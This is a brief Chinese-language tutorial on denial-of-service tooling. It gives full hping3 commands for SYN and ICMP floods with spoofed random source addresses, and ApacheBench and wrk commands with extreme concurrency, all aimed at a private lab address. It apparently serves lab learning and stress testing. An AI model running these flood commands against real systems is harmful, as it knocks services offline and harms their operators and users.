泛洪攻击的常见工具

泛洪攻击的常见工具

1. hping3 工具

这是kali自带的一个工具, 参数与功能众多, 默认是tcp模式.

常用参数:

    --flood         直接泛洪, 自动设置数量, 大小, 间隔(非常之猛)
    --rand-source   随机源ip地址
    -p              端口
    -c              包的数量
    -d              包的大小(默认56字节)
    -i              发送间隔
    -q              安静模式, 无回显信息
    -1 --icmp       icmp模式
    -2 --udp        udp模式
    -S  SYN包(半连接, 优先使用第一次握手)
    -A  ACK包
    -F  FIN包
    -R  RST包

1.1 SYN泛洪

hping3 -c 10000 -d 120 --rand-source -S -p 80 192.168.110.130
hping3 --flood --rand-source -S -p 80 192.168.110.130

1.2 ICMP泛洪

hping3 --icmp --flood --rand-source -d 120 192.168.110.130

2. web压力测试

2.1 ab(ApacheBench)测试

这是kali自带的测试工具

# -n 数量, -c 并发量
ab -n 1000000 -c 1000 http://192.168.110.130/home.php

2.2 wrk测试

该工具需要单独安装

安装

apt install wrk

使用:

# -c 连接数量, -d 持续时间, -t 线程数量
wrk -c 100000 -d 300s -t 5 http://192.168.110.130/home.php

2.3 JMeter等其他压测工具